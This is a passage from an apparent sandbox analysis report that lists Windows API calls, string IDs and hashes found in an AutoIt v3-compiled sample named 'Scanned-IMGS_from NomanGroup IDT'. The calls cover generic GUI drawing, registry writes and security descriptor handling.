                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2D80
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004D2D89
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2D98
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004D2DA1
                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2DA8
                                                                                • GlobalFree.KERNEL32(00000000), ref: 004D2DB3
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2DC5
                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004EFC38,00000000), ref: 004D2DDB
                                                                                • GlobalFree.KERNEL32(00000000), ref: 004D2DEB
                                                                                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 004D2E11
                                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 004D2E30
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2E52
                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D303F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                • API String ID: 2211948467-2373415609
                                                                                • Opcode ID: 958c8cf6c0a409aa28fb1cd5e20a2b07aa598db56f17b30d51e996182e6b84d4
                                                                                • Instruction ID: 17a6486f4471d2d702e20f0c67d2cbeb3a8b0ba58306d3f7e5ba75dddb9691a6
                                                                                • Opcode Fuzzy Hash: 958c8cf6c0a409aa28fb1cd5e20a2b07aa598db56f17b30d51e996182e6b84d4
                                                                                • Instruction Fuzzy Hash: 5E02CF71500208AFDB14CF64CD88EAF7BB9FF59315F00855AF915AB2A1DB74AD02CB68
                                                                                APIs
                                                                                • SetTextColor.GDI32(?,00000000), ref: 004E712F
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004E7160
                                                                                • GetSysColor.USER32(0000000F), ref: 004E716C
                                                                                • SetBkColor.GDI32(?,000000FF), ref: 004E7186
                                                                                • SelectObject.GDI32(?,?), ref: 004E7195
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004E71C0
                                                                                • GetSysColor.USER32(00000010), ref: 004E71C8
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 004E71CF
                                                                                • FrameRect.USER32(?,?,00000000), ref: 004E71DE
                                                                                • DeleteObject.GDI32(00000000), ref: 004E71E5
                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 004E7230
                                                                                • FillRect.USER32(?,?,?), ref: 004E7262
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004E7284
                                                                                  • Part of subcall function 004E73E8: GetSysColor.USER32(00000012), ref: 004E7421
                                                                                  • Part of subcall function 004E73E8: SetTextColor.GDI32(?,?), ref: 004E7425
                                                                                  • Part of subcall function 004E73E8: GetSysColorBrush.USER32(0000000F), ref: 004E743B
                                                                                  • Part of subcall function 004E73E8: GetSysColor.USER32(0000000F), ref: 004E7446
                                                                                  • Part of subcall function 004E73E8: GetSysColor.USER32(00000011), ref: 004E7463
                                                                                  • Part of subcall function 004E73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004E7471
                                                                                  • Part of subcall function 004E73E8: SelectObject.GDI32(?,00000000), ref: 004E7482
                                                                                  • Part of subcall function 004E73E8: SetBkColor.GDI32(?,00000000), ref: 004E748B
                                                                                  • Part of subcall function 004E73E8: SelectObject.GDI32(?,?), ref: 004E7498
                                                                                  • Part of subcall function 004E73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 004E74B7
                                                                                  • Part of subcall function 004E73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004E74CE
                                                                                  • Part of subcall function 004E73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 004E74DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                • String ID:
                                                                                • API String ID: 4124339563-0
                                                                                • Opcode ID: 00bf3dd7f6157bf3006f5fff89b84d2734a0ee973f7a83fb63a4307aee9160b8
                                                                                • Instruction ID: 57c1f21863b6beb65751bba55ca3325a1cfa0b06b2de23a6965cb2f5b671a61f
                                                                                • Opcode Fuzzy Hash: 00bf3dd7f6157bf3006f5fff89b84d2734a0ee973f7a83fb63a4307aee9160b8
                                                                                • Instruction Fuzzy Hash: A3A1A371008351BFD7009F60DC88A6BBBA9FF49331F100A29FA629A1E2D735D946DF56
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?), ref: 00468E14
                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 004A6AC5
                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 004A6AFE
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004A6F43
                                                                                  • Part of subcall function 00468F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00468BE8,?,00000000,?,?,?,?,00468BBA,00000000,?), ref: 00468FC5
                                                                                • SendMessageW.USER32(?,00001053), ref: 004A6F7F
                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 004A6F96
                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 004A6FAC
                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 004A6FB7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                • String ID: 0
                                                                                • API String ID: 2760611726-4108050209
                                                                                • Opcode ID: e47248e5b691411381ffcd42e94a2119a6324886eb6851ee78e3dc67da2b0789
                                                                                • Instruction ID: 9765572e8efea4ba28adc4620e72fd59b20c25bb3f8f7eb99513e97f0d6f0944
                                                                                • Opcode Fuzzy Hash: e47248e5b691411381ffcd42e94a2119a6324886eb6851ee78e3dc67da2b0789
                                                                                • Instruction Fuzzy Hash: B512BE30200651DFD725CF24C884BA7B7E5FF6A300F19456EF485CB261DB3AA892DB5A
                                                                                APIs
                                                                                • DestroyWindow.USER32(00000000), ref: 004D273E
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004D286A
                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 004D28A9
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 004D28B9
                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 004D2900
                                                                                • GetClientRect.USER32(00000000,?), ref: 004D290C
                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 004D2955
                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004D2964
                                                                                • GetStockObject.GDI32(00000011), ref: 004D2974
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004D2978
                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 004D2988
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D2991
                                                                                • DeleteDC.GDI32(00000000), ref: 004D299A
                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004D29C6
                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 004D29DD
                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 004D2A1D
                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 004D2A31
                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 004D2A42
                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 004D2A77
                                                                                • GetStockObject.GDI32(00000011), ref: 004D2A82
                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004D2A8D
                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 004D2A97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                • API String ID: 2910397461-517079104
                                                                                • Opcode ID: 5edfafb65f9fa7523b83d42b1b560dbacac879ba7105203aadc216542b72f1b9
                                                                                • Instruction ID: 93c6cb1e18120059bb436f4b3e25393ffa60588ed9fb48486c1926f03900f92c
                                                                                • Opcode Fuzzy Hash: 5edfafb65f9fa7523b83d42b1b560dbacac879ba7105203aadc216542b72f1b9
                                                                                • Instruction Fuzzy Hash: 2BB19D71A00209AFEB24DF68CC85FAF7BA9EF15715F00451AF914EB291D774AD01CB98
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 004C4AED
                                                                                • GetDriveTypeW.KERNEL32(?,004ECB68,?,\\.\,004ECC08), ref: 004C4BCA
                                                                                • SetErrorMode.KERNEL32(00000000,004ECB68,?,\\.\,004ECC08), ref: 004C4D36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DriveType
                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                • API String ID: 2907320926-4222207086
                                                                                • Opcode ID: 4245478bffe0c46821fc605f7f1ac3e31547212feb5e1aa8971015609f6963da
                                                                                • Instruction ID: 20240f72474bf192d9cfa42737ef06470f38a669aa6f6a3bb3bf3679c1425043
                                                                                • Opcode Fuzzy Hash: 4245478bffe0c46821fc605f7f1ac3e31547212feb5e1aa8971015609f6963da
                                                                                • Instruction Fuzzy Hash: 5C61E838601105DBEB44DF14CBA1EA97BB0BB84344B21441FF8079B662DB3DED82DB5A
                                                                                APIs
                                                                                • GetSysColor.USER32(00000012), ref: 004E7421
                                                                                • SetTextColor.GDI32(?,?), ref: 004E7425
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004E743B
                                                                                • GetSysColor.USER32(0000000F), ref: 004E7446
                                                                                • CreateSolidBrush.GDI32(?), ref: 004E744B
                                                                                • GetSysColor.USER32(00000011), ref: 004E7463
                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 004E7471
                                                                                • SelectObject.GDI32(?,00000000), ref: 004E7482
                                                                                • SetBkColor.GDI32(?,00000000), ref: 004E748B
                                                                                • SelectObject.GDI32(?,?), ref: 004E7498
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004E74B7
                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004E74CE
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004E74DB
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004E752A
                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 004E7554
                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 004E7572
                                                                                • DrawFocusRect.USER32(?,?), ref: 004E757D
                                                                                • GetSysColor.USER32(00000011), ref: 004E758E
                                                                                • SetTextColor.GDI32(?,00000000), ref: 004E7596
                                                                                • DrawTextW.USER32(?,004E70F5,000000FF,?,00000000), ref: 004E75A8
                                                                                • SelectObject.GDI32(?,?), ref: 004E75BF
                                                                                • DeleteObject.GDI32(?), ref: 004E75CA
                                                                                • SelectObject.GDI32(?,?), ref: 004E75D0
                                                                                • DeleteObject.GDI32(?), ref: 004E75D5
                                                                                • SetTextColor.GDI32(?,?), ref: 004E75DB
                                                                                • SetBkColor.GDI32(?,?), ref: 004E75E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 1996641542-0
                                                                                • Opcode ID: bbd25ae785ad1f0387fa87963798900acdc75bb721bed48ef5b08059ece1b4ea
                                                                                • Instruction ID: 92f9aec080cd3a04f1d898f21ad5351977345985f6e1a6b3db10c8c3ec378f5a
                                                                                • Opcode Fuzzy Hash: bbd25ae785ad1f0387fa87963798900acdc75bb721bed48ef5b08059ece1b4ea
                                                                                • Instruction Fuzzy Hash: 2B618172900258BFDF009FA4DC88EAEBFB9EB08321F104125F911AB2A2D7749941DF94
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 004E1128
                                                                                • GetDesktopWindow.USER32 ref: 004E113D
                                                                                • GetWindowRect.USER32(00000000), ref: 004E1144
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004E1199
                                                                                • DestroyWindow.USER32(?), ref: 004E11B9
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004E11ED
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004E120B
                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004E121D
                                                                                • SendMessageW.USER32(00000000,00000421,?,?), ref: 004E1232
                                                                                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 004E1245
                                                                                • IsWindowVisible.USER32(00000000), ref: 004E12A1
                                                                                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 004E12BC
                                                                                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 004E12D0
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004E12E8
                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 004E130E
                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 004E1328
                                                                                • CopyRect.USER32(?,?), ref: 004E133F
                                                                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 004E13AA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                • String ID: ($0$tooltips_class32
                                                                                • API String ID: 698492251-4156429822
                                                                                • Opcode ID: aca0f1eb3de59b2be138f15f8fc19ff66900fcf5b91338568cd873d4fce5ae61
                                                                                • Instruction ID: 09db6ec24870b08ecd865bc4cb48a961a9ab13884b1c9c5b963d0135c71da372
                                                                                • Opcode Fuzzy Hash: aca0f1eb3de59b2be138f15f8fc19ff66900fcf5b91338568cd873d4fce5ae61
                                                                                • Instruction Fuzzy Hash: 61B1AE71604380AFD704DF65C884B6BBBE4FF88345F00891EF9999B262C735E845CB99
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00468968
                                                                                • GetSystemMetrics.USER32(00000007), ref: 00468970
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0046899B
                                                                                • GetSystemMetrics.USER32(00000008), ref: 004689A3
                                                                                • GetSystemMetrics.USER32(00000004), ref: 004689C8
                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004689E5
                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004689F5
                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00468A28
                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00468A3C
                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 00468A5A
                                                                                • GetStockObject.GDI32(00000011), ref: 00468A76
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00468A81
                                                                                  • Part of subcall function 0046912D: GetCursorPos.USER32(?), ref: 00469141
                                                                                  • Part of subcall function 0046912D: ScreenToClient.USER32(00000000,?), ref: 0046915E
                                                                                  • Part of subcall function 0046912D: GetAsyncKeyState.USER32(00000001), ref: 00469183
                                                                                  • Part of subcall function 0046912D: GetAsyncKeyState.USER32(00000002), ref: 0046919D
                                                                                • SetTimer.USER32(00000000,00000000,00000028,004690FC), ref: 00468AA8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                • String ID: AutoIt v3 GUI
                                                                                • API String ID: 1458621304-248962490
                                                                                • Opcode ID: e34382107de2505be2b1d568162ef9ac4132fd5f94c35077fdf387833227309b
                                                                                • Instruction ID: fc3c5df6880a0934e29b1fef709d47c0285d3e5ffafc851c7fd54429fcbb4e7d
                                                                                • Opcode Fuzzy Hash: e34382107de2505be2b1d568162ef9ac4132fd5f94c35077fdf387833227309b
                                                                                • Instruction Fuzzy Hash: 67B1B2756002099FDF14DF68CC85BAE3BB4FB19314F15422AFA15AB290DB38E841CF59
                                                                                APIs
                                                                                  • Part of subcall function 004B10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004B1114
                                                                                  • Part of subcall function 004B10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B1120
                                                                                  • Part of subcall function 004B10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B112F
                                                                                  • Part of subcall function 004B10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B1136
                                                                                  • Part of subcall function 004B10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004B114D
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004B0DF5
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004B0E29
                                                                                • GetLengthSid.ADVAPI32(?), ref: 004B0E40
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 004B0E7A
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004B0E96
                                                                                • GetLengthSid.ADVAPI32(?), ref: 004B0EAD
                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 004B0EB5
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004B0EBC
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004B0EDD
                                                                                • CopySid.ADVAPI32(00000000), ref: 004B0EE4
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004B0F13
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004B0F35
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004B0F47
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B0F6E
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0F75
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B0F7E
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0F85
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B0F8E
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0F95
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004B0FA1
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0FA8
                                                                                  • Part of subcall function 004B1193: GetProcessHeap.KERNEL32(00000008,004B0BB1,?,00000000,?,004B0BB1,?), ref: 004B11A1
                                                                                  • Part of subcall function 004B1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,004B0BB1,?), ref: 004B11A8
                                                                                  • Part of subcall function 004B1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004B0BB1,?), ref: 004B11B7
                                                                                Memory Dump Source
                                                                                 • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                • String ID:
                                                                                • API String ID: 4175595110-0
                                                                                APIs
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004DC4BD
                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,004ECC08,00000000,?,00000000,?,?), ref: 004DC544
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 004DC5A4
                                                                                • _wcslen.LIBCMT ref: 004DC5F4
                                                                                • _wcslen.LIBCMT ref: 004DC66F
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 004DC6B2
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 004DC7C1
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 004DC84D
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004DC881
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004DC88E
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 004DC960
                                                                                Similarity
                                                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                • API String ID: 9721498-966354055
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 004E09C6
                                                                                • _wcslen.LIBCMT ref: 004E0A01
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004E0A54
                                                                                • _wcslen.LIBCMT ref: 004E0A8A
                                                                                • _wcslen.LIBCMT ref: 004E0B06
                                                                                • _wcslen.LIBCMT ref: 004E0B81
                                                                                  • Part of subcall function 0046F9F2: _wcslen.LIBCMT ref: 0046F9FD
                                                                                  • Part of subcall function 004B2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004B2BFA
